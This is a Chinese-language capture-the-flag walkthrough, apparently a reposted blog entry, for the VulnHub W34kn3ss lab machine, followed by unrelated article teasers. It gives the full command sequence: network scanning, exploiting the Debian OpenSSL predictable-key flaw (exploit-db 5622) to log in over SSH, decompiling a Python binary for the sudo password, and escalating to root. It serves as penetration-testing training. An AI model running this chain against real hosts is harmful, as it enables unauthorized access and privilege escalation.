W34kn3ss

news2024/11/15 7:38:12

靶机下载地址

https://www.vulnhub.com/entry/w34kn3ss-1,270/

靶机配置

主机发现

arp-scan -l

端口扫描

nmap -sV -A -T4 192.168.229.160

目录扫描

dirsearch -u "http://192.168.229.160" 

GETshell

80端口

http://192.168.229.160

这个页面表明,Apache2 服务器已经在Ubuntu系统上正确安装,并且服务器正在正常运行。这类默认页面对于渗透测试人员来说可能提供了一些有用的信息:

  1. 操作系统版本:页面显示服务器运行在Ubuntu系统上,渗透测试人员由此可以推测出操作系统的类型和潜在的版本,便于定制攻击方法,寻找系统的特定漏洞。
  2. Web服务器软件版本:知道服务器使用Apache2作为Web服务器软件后,渗透测试人员可以进一步尝试识别Apache2的具体版本。如果该版本存在已知漏洞(如远程代码执行漏洞或拒绝服务漏洞),则可能被利用。
  3. 默认配置:由于显示默认页面,说明服务器可能没有进行严格的配置和安全加固,比如没有修改默认的配置文件和路径。攻击者可以尝试利用一些默认设置(如目录遍历、文件泄露等)来获取更多信息或进行攻击。
  4. 文件路径:页面提示了Web服务器的默认文档根目录是/var/www/html/index.html,渗透测试人员可以推测系统的文件结构,尝试通过未授权的路径访问服务器上的其他文件。
  5. 潜在的暴露信息:如果管理员没有对系统进行必要的安全配置,例如关闭目录列表功能或更改默认页面,可能会无意中暴露更多的敏感信息,例如配置文件、日志文件、备份文件等。
http://192.168.229.160/test/
提示需要密码

443端口

http://192.168.229.160:443/

访问网站

兔子尾巴有一个值n30,可能作为账号或密码

对http://weakness.jth/进行目录扫描

拼接访问 private ,有两个文件,看一下内容

mykey.pub文件内容

notes.txt文件内容,提示这个 key 由 openssl 0.9.8c-1 生成

kali 使用 searchsploit工具查一下

searchsploit 0.9.8c-1

将5622.txt文件保存到当前目录下

searchsploit -m 5622

查看 5622.txt文件内容,给出了 url,需要下载

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2

下载后,进行解压

tar vxjf 5622.tar.bz2

匹配 mykey.pub 内容,得到公钥

# 使用命令
grep -r -l "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster"
 
# 公钥
4161de56829de2fe64b9055711f531c1-2537.pub

ssh -i 4161de56829de2fe64b9055711f531c1-2537 n30@192.168.229.160

发现执行sudo命令需要密码

sudo -l
ls
发现user.txt和可执行文件code

查看code文件类型

发现是python文件

file code

cp code /var/www/html
cd /var/www/html
python3 -m http.server
kali
wget http://192.168.229.160:8000/code

下载工具

pip install uncompyle6

修改文件名,工具执行

mv code code.pyc
uncompyle6 code.pyc

.pyc 文件是 Python 编译后的字节码文件。Python 解释器在运行 Python 代码时,会首先检查是否有对应的 .pyc 文件。如果存在,解释器会使用 .pyc 文件来加快代码的执行速度。

当 Python 源代码(.py 文件)第一次被解释器执行时,Python 会将源代码编译成字节码(.pyc 文件)。编译后的字节码文件可以被缓存起来,以便下次运行相同的代码时可以直接加载,而不必再次编译。

.pyc 文件包含了 Python 字节码指令,这些指令可以被解释器直接执行,而不需要先将源代码转换为机器码。.pyc 文件可以加快程序的启动速度,因为解释器不需要重新编译源代码,而是直接加载已经编译好的字节码。

需要注意的是,.pyc 文件是由解释器在第一次运行时生成的,并且在下次运行相同的代码时会被加载。如果源代码发生了变化,对应的 .pyc 文件也会被更新。

获得执行sudo的密码

提权

输入sudo -l命令查看当前权限

显示 all ,那么直接 sudo su 提权,提权成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2146717.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

代码随想录_刷题笔记_第二次

链表 — 环形链表 题目链接:142. 环形链表 II - 力扣(LeetCode) 题目要求: 给定一个链表的头节点 head ,返回链表开始入环的第一个节点。 如果链表无环,则返回 null。 如果链表中有某个节点&#xff0c…

【Delphi】遍历容器中所有的 TControl 控件

在 Delphi 中,你可以通过递归或者直接遍历 TForm 上的所有控件(TControl)。TForm 继承自 TWinControl,它有一个 Controls 属性,可以用于访问包含的所有控件。这个属性是一个数组,存储的是当前窗体上所有的控…

monorepo基础搭建教程(从0到1 pnpm+monorepo+vue)

monorepo 前言1、搭建空项目并配置pnpm-workspace.yamlpnpm initpnpm-workspace.yaml 2.配置packages测试文件配置相关内容 3.引入packages内容至公共package.json4.创建测试项目,并引入公共包结语 前言 有个项目要引入一个第三方库,但是第三方库下载下…

C++_类和对象(中篇)—— const成员函数、取地址运算符的重载

目录 三、类和对象(中) 6、取地址运算符重载 1、const成员函数 2、取地址运算符的重载 三、类和对象(中) 6、取地址运算符重载 1、const成员函数 将const修饰的成员函数称之为const成员函数,const修饰成员函数…

【网络安全的神秘世界】目录遍历漏洞

🌝博客主页:泥菩萨 💖专栏:Linux探索之旅 | 网络安全的神秘世界 | 专接本 | 每天学会一个渗透测试工具 先来了解两个概念: 身份认证:验证用户或者系统身份的过程,确保他们所声明的身份是真实的…

UE 禁用运行模式下的引擎内置按键

找到对应引擎版本安装目录下的BaseInput.ini文件,打开并修改

YoloV8改进策略:BackBone改进|Swin Transformer赋能YoloV8,性能跃升的新篇章

摘要 在深度学习领域,目标检测作为计算机视觉的核心任务之一,其性能的提升始终吸引着研究者们的目光。近期,我们创新性地将Swin Transformer这一前沿的Transformer架构引入到YoloV8目标检测模型中,通过替换其原有的主干网络,实现了检测性能的显著提升,为YoloV8系列模型注…

.Net网络通信组件 - TouchSocket

文章目录 .Net网络通信组件 - TouchSocket1、新建.Net8控制台项目2、Nuget安装TouchSocket组件3、编写服务端代码4、编写客户端代码5、编写Program代码6、运行效果7、日志组件(NLog)参考我的另一篇博客 .Net网络通信组件 - TouchSocket 1、新建.Net8控制…

网络安全学习路线,史上最全网络安全学习路线整理

很多小伙伴在网上搜索网络安全时,会出来网络安全工程师这样一个职位,它的范围很广,只要是与网络安全挂钩的技术人员都算网络安全工程师,一些小伙伴就有疑问了,网络安全现在真的很火吗? 那么无涯就带大家看…

《高等代数》范德蒙德行列式(应用)

说明:此文章用于本人复习巩固,如果也能帮助到大家那就更加有意义了。 注:1)此题中的行列式是缺失了一行的范德蒙德行列式,解题思路是将其与范德蒙德行列式进行对比,我们将其添上一行和一列补成范德蒙德行列…

解决SPI1在发送和接收8位数据时出现接收不同步的问题

STM32G474的SPI1工作在主机模式,将SPI1_MISO和SPI1_MOSI连接一起,实现自发自收测试。但是在“使用8位数据自发自收时”时,发现接收数据不是同步的。虽然SPI1初始化正确,但是还需要对SPI1_DR寄存器进行强制转换,否则&am…

2024年网络安全人才发展报告一览

前不久,由信通院、工业和信息化部教育与考试中心、中国网络空间新兴技术安全创新论坛等单位联合发布了《2024网络安全产业人才发展报告》,长达87页的调研报告深度剖析了目前中国网络安全产业人才供需、分布、就业等现状,这里,星尘…

C++ 第三讲:内存管理

C 第三讲:内存管理 1.C内存分布2.内存管理方式2.1C语言内存管理方式2.2C内存管理方式2.2.1new\delete操作内置类型2.2.2new\delete操作自定义类型 3.operator new与operator delete函数4.new和delete实现原理4.1内置类型4.2自定义类型 5.定位new5.1内存池的基本了解…

基于Java的学生档案管理系统的设计与实现

基于springbootvue实现的学生档案管理系统 (源码L文ppt)4-065 第4章 系统设计 4.1 总体功能设计 学生档案管理系统的总体功能设计包括学生信息管理、课程管理、教师信息管理、成绩管理和系统配置管理。系统将提供用户友好的界面,支…

【网络】传输层协议TCP

TCP协议 TCP(Transmission Control Protocol,传输控制协议)是一种面向连接的、可靠的、基于字节流的传输层通信协议,由IETF的RFC 793定义。TCP在IP(Internet Protocol,互联网协议)网络层上提供…

【Linux】—— muduo网络库的安装配置与使用

muduo网络库编程 Linux环境下Epollpthread线程库 Boost库安装与使用 安装Boost库 下载boost库源码,linux环境解压 tar -zxvf boost_1_69_0.tar.gz 解压完成后,进入该目录,查看内容 运行bootstrap.sh工程编译构建程序 ./bootstrap.sh …

javascript-代码执行原理

js 是解释型语言 js 引擎执行流程 分为两个阶段: 语法分析执行阶段执行阶段涉及的数据结构: 调用栈。处理执行上下文和执行代码内存堆。给对象分配内存任务队列。暂存待执行的任务,分为宏任务队列和微任务队列语法分析 词法分析 > 语法分析 > 代码生成(字节码) …

封装svg图片

前言 项目中有大量svg图片,为了方便引入,所以对svg进行了处理 一、svg是什么? svg是可缩放矢量图形,是一种图片格式 二、使用步骤 1.创建icons文件夹 将icons文件夹放进src中,并创建一个svg文件夹和index.js&…

深入探索迭代器模式的原理与应用

🎯 设计模式专栏,持续更新中 欢迎订阅:JAVA实现设计模式 🛠️ 希望小伙伴们一键三连,有问题私信都会回复,或者在评论区直接发言 迭代器模式 💻 迭代器模式 (Iterator Pattern) 是一种行为设计模…